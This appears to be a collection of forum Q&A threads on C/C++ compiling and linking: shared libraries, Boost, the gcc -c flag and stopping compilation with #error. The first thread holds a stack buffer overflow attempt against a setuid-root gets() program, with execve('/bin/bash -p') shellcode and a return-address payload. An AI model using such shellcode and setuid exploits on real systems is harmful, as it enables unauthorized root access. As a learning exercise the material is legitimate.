Buffer overflow: shell not spawning

I'm trying a buffer overflow on a simple program:
    #include <stdio.h>
    int main(int argc, char **argv)
    {
        char buf[8];
        gets(buf);
        printf("%s\n", buf);
        return 0;
    }
Compiled with these options:
    gcc -g exploit1.c -fno-stack-protector -z execstack -o exploit1
The binary is setuid:
    ls -al exploit1
    -r-sr-x--- 1 root root 6016 janv. 31 01:47 exploit1
So I have disabled all stack options and ASLR.
My shellcode is:
    \x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80
But no root shell appears; I get this error:
    python -c 'print "A"*20 + "\xbf\xfe\xff\xbf"'| ./exploit1
    -bash: ./exploit1: Permission denied
    close failed in file object destructor:
    sys.excepthook is missing
    lost sys.stderr
Have I missed something?

You don't have permission to execute exploit1. Root needs to do:
    chmod o+x exploit1

Related

Shared library not found in /usr/local/lib

Similar questions got asked a lot, but I still don't quite get what's wrong with how I compiled and installed my shared library.
As far as compiling goes, I do:
    > gcc -c -fPIC libt.c
    > gcc -shared -Wl,-soname,libt.so.0 -o libt.so.0.1 libt.o
In order to install the library I run:
    > cp libt.so.0.1 /usr/local/lib/
    > cp libt.h /usr/local/include/
    > ln -s /usr/local/lib/libt.so.0.1 /usr/local/lib/libt.so.0 # ldconfig would setup this symlink itself ...
    > ln -s /usr/local/lib/libt.so.0 /usr/local/lib/libt.so # ... but not this one, so I do it myself
    > sudo ldconfig
/usr/local/lib is included in /etc/ld.so.conf.d/libc.conf, and ldconfig -p | grep libt yields:
    libt.so.0 (libc6,x86-64) => /usr/local/lib/libt.so.0
    libt.so (libc6,x86-64) => /usr/local/lib/libt.so
So, as far as I can tell, everything looks okay up to this point. However, compiling a program that's supposed to use my library fails:
    > gcc -o prog main.c -llibt
    /usr/bin/ld: cannot find -llibt
libt.h:
    #ifndef libt_h__
    #define libt_h__
    extern int add(int, int);
    #endif
libt.c:
    int
    add(int a, int b)
    {
        return a + b;
    }
main.c:
    #include <stdio.h>
    #include <stdlib.h>
    #include "libt.h"
    void
    print_usage()
    {
        printf("usage: ./prog <number a> <number b>\n");
    }
    int
    main(int argc, char *argv[])
    {
        int a = 0, b = 0, c = 0;
        if (argc != 3) {
            print_usage();
            return 1;
        }
        a = atoi(argv[1]);
        b = atoi(argv[2]);
        c = add(a, b);
        printf("%d\n", c);
        return 0;
    }
Figured it out. While library names have to be prefixed with "lib", that prefix must not be specified when linking. That is, gcc -o prog main.c -llibt is wrong while gcc -o prog main.c -lt works as expected.

Dart VM embedding (libdart_jit.a) on MacOS produces "dyld: Symbol not found: __ZN4dart13FLAG_profilerE"

I am trying to make my first C++ app with an embedded Dart VM. I have a problem with the minimal compiler setup on my macOS 10.14.6. My build is successful, but when I start the app, it crashes with:
    $ clang++ -I ${HOME}/opt/dart-sdk --define-macro DART_SHARED_LIB=1 -L ./libs/debug -ldart_jit -lm -lz -O2 -undefined dynamic_lookup -o reproduce *.cpp
    $ ./reproduce
    dyld: Symbol not found: __ZN4dart13FLAG_profilerE
Although the symbol __ZN4dart13FLAG_profilerE is present inside the binary:
    $ nm reproduce | grep __ZN4dart13FLAG_profilerE
    U __ZN4dart13FLAG_profilerE
How do I compile/link this properly?
My reproduce program is:
    #include <cstdlib>   // for ::free
    #include <iostream>
    #include <include/dart_api.h>
    int main(int argc, const char * argv[]) {
        char* setVMFlagsError = Dart_SetVMFlags(argc, argv);
        if (setVMFlagsError != nullptr) {
            std::cerr << "Error while setting Dart VM flags: " << setVMFlagsError << "\n";
            ::free(setVMFlagsError);
            return 1;
        } else {
            Dart_InitializeParams params = {};
            (void)params;   // not used yet in this minimal reproducer
            std::cout << "Hello, World!\n";
            return 0;
        }
    }
The Dart SDK was built by following the official documentation:
    (dart-sdk-pyenv) ~/tmp/dart-sdk/sdk $ ./tools/build.py --mode all --arch x64 create_sdk
    (dart-sdk-pyenv) ~/tmp/dart-sdk/sdk $ cp -a ~/tmp/dart-sdk/sdk/xcodebuild/DebugX64/dart-sdk ~/opt/

"Permission denied" running executable built with `-c -o`

This may sound stupid, but I only have a .c file (openfile.c) and it looks like this:
    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <unistd.h>
    int main(int argc, char* argv[]){
        if(argc != 2){   /* argv[1] must exist before it is used */
            fprintf(stderr, "usage: %s <path>\n", argv[0]);
            return 1;
        }
        char* path = argv[1];
        mode_t mode = S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH;
        int fd = open(path, O_WRONLY | O_EXCL | O_CREAT, mode);
        if(fd == -1){
            perror("open");
            return 1;
        }
        return 0;
    }
and I want to write a Makefile for it, so it shouldn't be hard. The Makefile looks like this:
    openfile: openfile.c
    	gcc -c -o openfile openfile.c
because I don't have/need an openfile.h, so I just need the one openfile.c. And it compiles, and when I run ./openfile, bang, it says: bash: ./openfile: Permission denied
So where's the problem? Do I have to write a .h file?
The problem is that you don't need -c. When you pass -c to gcc it doesn't perform the linking step, so you actually get an object file.

Boost/CentOS linking issue

I'm trying to learn Boost threading.
I'm using code from a tutorial online; after some errors I realised that I needed a newer version of Boost, so I downloaded the latest version of it into a directory, unzipped it and installed it with the commands:
    ./bootstrap.sh
    ./bjam install
The sample code I'm trying to run is this:
    #include <boost/thread.hpp>
    #include <iostream>
    #include <unistd.h>   // for sleep()
    using namespace std;
    using namespace boost;
    void threader()
    {
        for (int i = 0; i < 5; ++i)
        {
            sleep(1);
            cout << boost::this_thread::get_id() << "-" << i << endl;
            //cout << "-" << i << endl;
        }
    }
    int main()
    {
        thread t(threader);
        sleep(1);
        thread u(threader);
        t.join();
        u.join();
    }
I compiled with the same line I used with the old version of Boost (1.33, as comes with CentOS as standard):
    g++ -Wall -L/usr/local/lib -lboost_thread threadtest.cpp -o threadtest
It compiled without error (unlike with the old version of Boost), but when I run threadtest I get:
    ./threadtest: error while loading shared libraries: libboost_thread.so.1.47.0: cannot open shared object file: No such file or directory
Looking into the /usr/local/lib directory I can see the following:
    -rw-r--r-- 1 root root 217270 Nov 10 12:50 libboost_thread.a
    lrwxrwxrwx 1 root root 25 Nov 10 12:43 libboost_thread.so -> libboost_thread.so.1.47.0
    -rwxr-xr-x 1 root root 138719 Nov 10 12:43 libboost_thread.so.1.47.0
So I cannot see why it's not working.
I think it's to do with the -lboost_thread part of the compilation line.
I tried linking to the library directly with:
    g++ -Wall -L/usr/local/lib libboost_thread.a threadtest.cpp -o threadtest
But it again can't find the file.
Can anyone help with this?
I needed to re-add the path of my lib directory to my LD_LIBRARY_PATH with the following:
    export LD_LIBRARY_PATH="/usr/local/lib/"
That did the trick.

GCC #pragma to stop compilation

Is there a GCC pragma directive that will stop, halt, or abort the compilation process?
I am using GCC 4.1, but I would want the pragma to be available in GCC 3.x versions also.
You probably want #error:
    $ cd /tmp
    $ g++ -Wall -DGoOn -o stopthis stopthis.cpp
    $ ./stopthis
    Hello, world
    $ g++ -Wall -o stopthis stopthis.cpp
    stopthis.cpp:7:6: error: #error I had enough
File stopthis.cpp:
    #include <iostream>
    int main(void) {
        std::cout << "Hello, world\n";
    #ifndef GoOn
    #error I had enough
    #endif
        return 0;
    }
I do not know about a #pragma, but #error should do what you want:
    #error Failing compilation
It will terminate compilation with the error message "Failing compilation".
This works:
    #include <stophere>
GCC stops when it can't find the include file. I wanted GCC to stop if C++14 was not supported.
    #if __cplusplus<201300L
    #error need g++14
    #include <stophere>
    #endif
While typically #error is sufficient (and portable), there are times when you want to use a pragma, namely, when you want to optionally cause an error within a macro.
Here is an example use which depends on C11's _Generic and _Pragma.
This example ensures var isn't an int * or a short *, but not a const int * at compile time.
Example:
    #define MACRO(var) do { \
        (void)_Generic(var, \
            int *: 0, \
            short *: 0, \
            const int *: 0 _Pragma("GCC error \"const not allowed\"")); \
        \
        MACRO_BODY(var); \
    } while (0)
    #pragma GCC error "error message"
Ref: 7 Pragmas
You can use:
    #pragma GCC error "my message"
But it is not standard.
An alternative is to use static_assert:
    #if defined(_MSC_VER) && _MSC_VER < 1916
    static_assert(false, "MSVC supported versions are 1916 and later");
    #endif
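The _Generic answer and the static_assert answer above can be combined. The following added example (not code from any of the answers) rejects a const int * or const short * argument inside a macro at compile time with C11 _Static_assert fed by a _Generic selection, instead of a pragma; the macro names IS_CONST_PTR and ZERO_OBJ are hypothetical.

```c
#include <string.h>

/* 1 when expr is a pointer to const int or const short, 0 otherwise.
 * A _Generic selection with constant results is itself an integer
 * constant expression, so it can be used in _Static_assert. */
#define IS_CONST_PTR(expr) _Generic((expr), \
    const int *:   1, \
    const short *: 1, \
    default:       0)

/* Hypothetical macro: zero the pointee, but refuse const pointers at
 * compile time. Only the selected association's value reaches the
 * assertion, so non-const arguments compile cleanly. */
#define ZERO_OBJ(ptr) do { \
    _Static_assert(!IS_CONST_PTR(ptr), "const pointer not allowed"); \
    memset((ptr), 0, sizeof *(ptr)); \
} while (0)

int zero_and_read(int *p)
{
    ZERO_OBJ(p);            /* int *: accepted, *p becomes 0 */
    return *p;
}

int is_const_int_ptr(const int *p) { return IS_CONST_PTR(p); }
int is_int_ptr(int *p)             { return IS_CONST_PTR(p); }

/* Enabling this function stops the build with
 * "static assertion failed: "const pointer not allowed"". */
#if 0
void rejected(const int *p) { ZERO_OBJ(p); }
#endif
```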
